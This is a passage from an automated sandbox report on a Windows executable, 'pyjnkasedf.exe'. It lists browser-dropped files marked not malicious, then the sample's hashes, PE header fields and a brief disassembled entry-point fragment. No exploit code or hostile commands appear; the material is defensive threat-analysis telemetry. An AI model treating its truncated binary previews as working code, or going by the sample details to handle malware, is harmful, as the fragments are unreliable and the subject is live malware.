                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):962
                                                                                                                                                                                                                                                      Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                      MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                      SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                      SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                      SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 30 20:38:22 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2673
                                                                                                                                                                                                                                                      Entropy (8bit):3.9833638375038007
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:8dobdiTODVHzidAKZdA1uehwiZUklqehv6y+3:8dVcIpy
                                                                                                                                                                                                                                                      MD5:77C082674E7B99F908ED47FA7FED6D4A
                                                                                                                                                                                                                                                      SHA1:FB4CAD9093922E8F60F5849EB4ACB26BED2F0501
                                                                                                                                                                                                                                                      SHA-256:28743399913437D8108EB6F52E4E5F442C1D3B276E368B49D238DBF275982B4D
                                                                                                                                                                                                                                                      SHA-512:0A3C9AAB19FC4748EB19787C46E3D9C516EC0FF4932F57019BE50C27197CA626CA9F80BBEF06A32539D954105466A8FDBE44EB4BBCD75DD6CA3D53578C9B3695
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......B.pC......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I~Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V~Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V~Y.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V~Y............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V~Y.....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 30 20:38:22 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2675
                                                                                                                                                                                                                                                      Entropy (8bit):4.001447696845087
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:8CobdiTODVHzidAKZdA1Heh/iZUkAQkqehw6y+2:8CVcu9QAy
                                                                                                                                                                                                                                                      MD5:3C32D60FE80459804C93A66A36DD6AA3
                                                                                                                                                                                                                                                      SHA1:9ECB8C8D0801F3765C124A74EB675FDDB74C505E
                                                                                                                                                                                                                                                      SHA-256:A6DD93BF26B49B6E361953B4507876129EE70C6FE041CA54CE3FDD05B77E50E3
                                                                                                                                                                                                                                                      SHA-512:5FFA3A6DFACFBED4BA4496C9CD3617B206429A77789B1BEAE551E937CE8BC272425088B93C289E23CA028CAE50C8B8B156C35E2BB2740EF589D256BB988E81F2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....4.pC......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I~Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V~Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V~Y.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V~Y............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V~Y.....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 08:59:33 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2689
                                                                                                                                                                                                                                                      Entropy (8bit):4.011920137779368
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:8FobdiTODbHzidAKZdA149eh7sFiZUkmgqeh7s66y+BX:8FVcAn9y
                                                                                                                                                                                                                                                      MD5:8EBEDECDF97AC19DE6FC268C3E4ACE0F
                                                                                                                                                                                                                                                      SHA1:9A064E1F8674E551050A98CA87DFC07EE20275C2
                                                                                                                                                                                                                                                      SHA-256:42065855FD2F69C2C6C9DC11A01561884525AD9F9ADFE51068FC8326EBA44066
                                                                                                                                                                                                                                                      SHA-512:B01F59734F65585E24B1C7C8F0BCFF45C63114E43257804E18B375EBA4FD733B4BF525C973320D563BDBFB753C5DA386ED294D5E3EC999217C28EBB3FC1864A9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,....K..r.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I~Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V~Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V~Y.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V~Y............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VEW.L....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 30 20:38:22 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                                      Entropy (8bit):3.99663105060588
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:80obdiTODVHzidAKZdA14ehDiZUkwqeh86y+R:80VcFHy
                                                                                                                                                                                                                                                      MD5:785B55B46022FC1C58CC24C9F7412D4D
                                                                                                                                                                                                                                                      SHA1:5B3D5435408FF1C245232985F01EA39833DF0A3F
                                                                                                                                                                                                                                                      SHA-256:E93B355F1F3394D2DF900039C1A1A5BDD0AA591C75A7315AAD2A412E88E3508E
                                                                                                                                                                                                                                                      SHA-512:191C4AF383149A27181C42608059D1C21B8CABC27D843F531B6ABAE49D596B17FB7DF134D7BC358F479AF707486796C507BEEC00549A97545F6B35BAAFCC76B3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,....^%+.pC......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I~Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V~Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V~Y.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V~Y............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V~Y.....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 30 20:38:22 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                                      Entropy (8bit):3.9864705557104916
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:8aobdiTODVHzidAKZdA1mehBiZUk1W1qeh+6y+C:8aVcF9jy
                                                                                                                                                                                                                                                      MD5:C6C9ED98BECC02981D2BBA6C0309256E
                                                                                                                                                                                                                                                      SHA1:2A842DA8923016A6540FF9CB757AA45A1154D788
                                                                                                                                                                                                                                                      SHA-256:0711201087061B4DCAC067F5DEF734F7FA75E6D576E38602D1B531A16E507F37
                                                                                                                                                                                                                                                      SHA-512:CF57F947CA6AA8B36F51B09C86285831AE3C1AFAF17CD77C5C8644A827E974B4545065166AF5361BAF91D4EBAD7F4AD6E554C6076B92894DDF7F5FEB54C64542
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......;.pC......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I~Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V~Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V~Y.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V~Y............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V~Y.....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 30 20:38:22 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2679
                                                                                                                                                                                                                                                      Entropy (8bit):3.998636230607094
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:8VobdiTODVHzidAKZdA1duT1ehOuTbbiZUk5OjqehOuTbU6y+yT+:8VVc8TyTbxWOvTb9y7T
                                                                                                                                                                                                                                                      MD5:9EFE4C3D2198093C343C80C1D31DBE74
                                                                                                                                                                                                                                                      SHA1:1DC0D025DC375DCD1296AAE19C360427E0BBC8BE
                                                                                                                                                                                                                                                      SHA-256:82215C0F661D4145D726BB221A4DBCB065683F30C0AFC703D430555A68384AC5
                                                                                                                                                                                                                                                      SHA-512:E8623173A90CC27AE93F7BF93A2A8D10A67C80FA447969B8EFF2B416F31FA9412633A9E8A9365C299013DE5519B1C356B19E4EF3CA9FAF995F8C96C6981252C8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......!.pC......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I~Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V~Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V~Y.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V~Y............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V~Y.....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3354)
                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                      Size (bytes):3359
                                                                                                                                                                                                                                                      Entropy (8bit):5.848412148011637
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:6tg9li0kcFd66666dtb0JNXIuxIMYSVjNTZeTmOQffQffo:6i7TkcFd66666oJxIYljdATmV
                                                                                                                                                                                                                                                      MD5:390E19896C3C2C09BE208C11EB7E7E94
                                                                                                                                                                                                                                                      SHA1:204F513E9D65C016D40C69FB21C68227388B68D9
                                                                                                                                                                                                                                                      SHA-256:3EA3E185CA04D4B6F549D95B18B9D1F5A637E561685AF6D6A04902C664EF2C90
                                                                                                                                                                                                                                                      SHA-512:DFB498BAA352A1AFD1542CB59F189AA43597DEC98A47BB77BE40E5B0FB983CB153570BA301CC9CB3DEBB346F89197545ADF0A4D0627309DA7192A6E00A13DACF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                      Preview:)]}'.["",["tui flight aborted cabin pressure error","sikandar ka muqaddar movie review","nyt strands today yas queen","mlb juan soto","oahu waves","ripple xrp price prediction","stanford football andrew luck","disney+ subscription black friday"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWY1aHZ0MmpyEidKdWFuIFNvdG8g4oCUIERvbWluaWNhbiBiYXNlYmFsbCBwbGF5ZXIy1w1kYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFjQUFBQkJBTUJBQUFBQUFBQUFBQUFBQUFHQUFFRUJ3SURCUWoveEFBekVBQUNBUU1DQkFNRkNBTUJBQUFBQUFBQkFnTUFCQkVGSVFZU0V6R
                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                      Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                      MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                      Size (bytes):132980
                                                                                                                                                                                                                                                      Entropy (8bit):5.435128290616699
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:fjkX3ioI5wrfFiC8jMbk/5xnRlpvsMTwR2i6o:f03dDFqr/5xnRlpvrwR8o
                                                                                                                                                                                                                                                      MD5:0F49C7E4B5247F04F1B02B55E6F7F563
                                                                                                                                                                                                                                                      SHA1:BCC956AB932132702650ECC35AD6ECC42CDEC774
                                                                                                                                                                                                                                                      SHA-256:8332CED53D35392DDAFB628DD4B7470BF40164E23CD2F9829B1ADC4A231ACEA0
                                                                                                                                                                                                                                                      SHA-512:06FE993A5A5DB53C645128D29F155C196041099ABA87EC6264C0C2D4153D60365ABE1EEA1C384D0682F74D940BF918B1C21F023B864F62736166F5D166303B84
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):7.232348703139293
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:pyjnkasedf.exe
                                                                                                                                                                                                                                                      File size:419'328 bytes
                                                                                                                                                                                                                                                      MD5:3a94ac80a1bbe958b6544874f311be69
                                                                                                                                                                                                                                                      SHA1:bc6352ee84bed107a4b30b545934698c4e664baf
                                                                                                                                                                                                                                                      SHA256:1839ee5c3534ad1a6929c9de33bce63cf6f96cce1ae3dc8240f4cf352250db0f
                                                                                                                                                                                                                                                      SHA512:f31d93889251ec2c6581107a7a0122be63d5f7b8253403736d38f1d2ffa2cb693e30a205ceb36b823265fd58bb2854cc44064988110daf3fe1c8ea02e7d2227c
                                                                                                                                                                                                                                                      SSDEEP:6144:zhk7s+AfJjoF3U5w81tLffIru6t1tztD675DoRK3L9YhZmdC/0fNSZH97ndaW9:P+UJjoF3U5w8rk8LeYcR97nQW
                                                                                                                                                                                                                                                      TLSH:D6947B5236A2CDF8D29084BF048E9BBC1F5A89D6BFC0A2D37594D89E5D792C7443234E
                                                                                                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&EDg.................R........................@...........................&..............................................?.....
                                                                                                                                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                      Entrypoint:0x43c8e6
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                      DLL Characteristics:NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x67444526 [Mon Nov 25 09:36:38 2024 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                      Import Hash:81961373b32efd4098659dcd8637f4f9
                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      je 00007F6FF0817EA5h
                                                                                                                                                                                                                                                      jne 00007F6FF0817EA3h
                                                                                                                                                                                                                                                      mov eax, FD32CBE8h
                                                                                                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                      add dword ptr [eax+002463E8h], edi
                                                                                                                                                                                                                                                      add byte ptr [ebx+eax+75h], dh
                                                                                                                                                                                                                                                      add dword ptr [eax-03B63818h], edi
                                                                                                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                      add dword ptr [eax-03B28E18h], edi
                                                                                                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                      add dword ptr [eax-03B2B618h], edi
                                                                                                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                      add dword ptr [eax-03B01518h], edi
                                                                                                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                      add dword ptr [eax-03B23718h], edi
                                                                                                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                      add dword ptr [eax-00573218h], edi
                                                                                                                                                                                                                                                      push dword ptr [ecx]
                                                                                                                                                                                                                                                      rol dl, 00000010h
                                                                                                                                                                                                                                                      add ah, cl
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
